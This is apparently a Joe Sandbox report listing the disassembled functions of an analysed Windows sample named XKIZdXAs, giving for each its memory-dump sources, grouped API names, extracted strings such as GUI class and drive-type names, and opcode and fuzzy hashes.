                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                          • Instruction ID: 8fba0b6b832352f603ff595af63501d289543d26f779f0cdac307f85b46b2986
                                                                          • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                          • Instruction Fuzzy Hash: 3EF068B1B1D6958EDBA4DF2CA442629B7D0E70C380FD08039D58D83F54DE3C9051AF14
                                                                          Function 00007FF7ADC259C8 Relevance: .0, Instructions: 2COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                          • Instruction ID: ee8a7ebeee55e1039885759cf7b80a2036511e9735bc580500f1fb0cf9739c75
                                                                          • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                          • Instruction Fuzzy Hash: BCA0012992F8029CE644BB40A850021A230EB50722BD20432D00D41571BE3CA4838220
                                                                          Function 00007FF7ADCAE95C Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 3521893082-0
                                                                          • Opcode ID: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                                          • Instruction ID: 177edb1797634b55808ba6976abc1c4e207869c8fec456b57012362261b15e49
                                                                          • Opcode Fuzzy Hash: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                                          • Instruction Fuzzy Hash: BCA1B476F1E6028AEB54AB61984457DA761FB48B64FD24630CE2E13BE4EF3CD4468360
                                                                          Function 00007FF7ADC84F30 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 247COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DriveType
                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                          • API String ID: 2907320926-4222207086
                                                                          • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                          • Instruction ID: 282e4fda5ec944b668ac384d13a1c9ed3544fe9c3742a02f850dbaa2fe8637f9
                                                                          • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                          • Instruction Fuzzy Hash: 5DB17121E1FA0298EA55BF19D85057CE361EB40B86FE65031D90E076B9FF7DE9478320
                                                                          Function 00007FF7ADCAECB4 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 1996641542-0
                                                                          • Opcode ID: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                                          • Instruction ID: 44c1e1b4ce843e6f0a960813b7e3d46a8708035488fbe7ab31cb9dcfe98425f1
                                                                          • Opcode Fuzzy Hash: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                                          • Instruction Fuzzy Hash: 6B71C436B1EA418AE764AB11E84463EB362FB89BA0FD14234DD5E437E4EF3CD4468750
                                                                          Function 00007FF7ADCA6EA0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 268windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                          • String ID: tooltips_class32
                                                                          • API String ID: 698492251-1918224756
                                                                          • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                          • Instruction ID: d0861969a331016f74e4f474f44fd01b9fcf82965f69d3750ab0c2579443d86f
                                                                          • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                          • Instruction Fuzzy Hash: 47C16E32A19B518AEB14DF65E4442AEB7A1FB88B84FD10435EA5E47774EF3CE442CB10
                                                                          Function 00007FF7ADC72C10 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 175windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                          • String ID: @
                                                                          • API String ID: 3869813825-2766056989
                                                                          • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                          • Instruction ID: b44b34bd6487d45b05aadf2752e3efca8a58236082cd824bceeff255107263d8
                                                                          • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                          • Instruction Fuzzy Hash: 5E818132A1AA428AE750EF75D95067DB3A1FB44B88FC14531CE4E57BA8EF38D846C710
                                                                          Function 00007FF7ADC02620 Relevance: 28.7, APIs: 19, Instructions: 201COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Color$LongWindow$ModeObjectStockText
                                                                          • String ID:
                                                                          • API String ID: 554392163-0
                                                                          • Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                          • Instruction ID: d0319e66db030535112073e22823d992a14e61be8508b0b1b642d25f35667d05
                                                                          • Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                          • Instruction Fuzzy Hash: 7481A461D1E95689EB71A729944C279E392FF45B68FD70231C95D432F4FE3CA8838720
                                                                          Function 00007FF7ADC7C81C Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 140COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                          • API String ID: 222038402-1459072770
                                                                          • Opcode ID: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                                          • Instruction ID: e79fe1bb45823e8b84f23bde8d072f908e7fdc320c104b97adc5883c722a4dc4
                                                                          • Opcode Fuzzy Hash: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                                          • Instruction Fuzzy Hash: 42517B25B0E6424AEE54FB2695112B9A391EF85FE0FC24431ED5D47BA6FE3CE5038720
                                                                          Function 00007FF7ADCA6608 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 475windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharMessageSendUpper
                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                          • API String ID: 3974292440-4258414348
                                                                          • Opcode ID: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                          • Instruction ID: 67dfefb109f41162846fb4b6e2d3cc9ec19d9913333c4e9afe51ad61da6fe454
                                                                          • Opcode Fuzzy Hash: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                          • Instruction Fuzzy Hash: EA12D517B5EA538AEE50BB6588011BDE6A1EF54F84BC64A31DA5D477B1FE3CE4038320
                                                                          Function 00007FF7ADC83FD0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 197COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$BuffCharDriveLowerType
                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                          • API String ID: 1600147383-4113822522
                                                                          • Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                          • Instruction ID: 49aef0a297bbe57765ce5272bec378f15207f0f31c3cb4e7c23753a01012610d
                                                                          • Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                          • Instruction Fuzzy Hash: E381AF22B1EA5289EB00AB75D8506BCA3A1FB54B89FD64131CA4D47AA4FF3CD547C360
                                                                          Function 00007FF7ADCB0118 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 175windowlibraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                          • String ID: .dll$.exe$.icl
                                                                          • API String ID: 258715311-1154884017
                                                                          • Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                          • Instruction ID: 9083e64e7802327a86dc9cc2d8c1ca9bd5c6a49db4bec95a36f92ade8ab15b02
                                                                          • Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                          • Instruction Fuzzy Hash: 0F710332A0EA528AEB64AF2194446B9A3A0FF45B94FC64635ED1D43BB4FF3CD446D310
                                                                          Function 00007FF7ADCB03D0 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                          • String ID:
                                                                          • API String ID: 3840717409-0
                                                                          • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                          • Instruction ID: 8c4ab5f375bce110702f3bf08db965a127a81e3098f1921bb9a29cdaaed9b6ed
                                                                          • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                          • Instruction Fuzzy Hash: 26518C36B1AB518AEB14EF66E844A6D73A0FB48B94BD14131DE1E03B24EF3DD40AC710
                                                                          Function 00007FF7ADC80D70 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit
                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                          • API String ID: 2610073882-3931177956
                                                                          • Opcode ID: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                                          • Instruction ID: 96de4e21588f8e7a3a70d68c018e0d0f773747d58b3be3c09c3a378e60422a45
                                                                          • Opcode Fuzzy Hash: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                                          • Instruction Fuzzy Hash: 81028232A0EA4289EB55BF65D05457DE3A1FF04B82FCB4535CA0E07AA4EF2DE452D360
                                                                          Function 00007FF7ADC8246C Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 281fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                          • String ID: aut
                                                                          • API String ID: 130057722-3010740371
                                                                          • Opcode ID: 9e3bb30c6d43dfc108f49b63acd44aa3cfb888b98a274a36fddad15c1dafbe64
                                                                          • Instruction ID: 78aeaf75b1af259db741394c608da7b45bb80c898a56b0f5929c1310839a7ba0
                                                                          • Opcode Fuzzy Hash: 9e3bb30c6d43dfc108f49b63acd44aa3cfb888b98a274a36fddad15c1dafbe64
                                                                          • Instruction Fuzzy Hash: 52C1553261D6869AEB20EF25E8406EDE760FB55788FC14036EA4D47A69FF7CD206C710
                                                                          Function 00007FF7ADCAE40C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 177windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                          • String ID: tooltips_class32
                                                                          • API String ID: 2443926738-1918224756
                                                                          • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                          • Instruction ID: af9b1244c4241efe21711c5e959fac00eacfd8b8845f9b0cba87b22a77353975
                                                                          • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                          • Instruction Fuzzy Hash: 31918A36A1AB8589EB50DF65E4507ADB7A1EB88B84F814436DE4D07B68EF3CD046C720
                                                                          Function 00007FF7ADC94F54 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                          • String ID:
                                                                          • API String ID: 2598888154-3916222277
                                                                          • Opcode ID: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
                                                                          • Instruction ID: e591f319812a62f20727347e1a965d0484fc395e80aed5fed086a802f2bd5b21
                                                                          • Opcode Fuzzy Hash: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
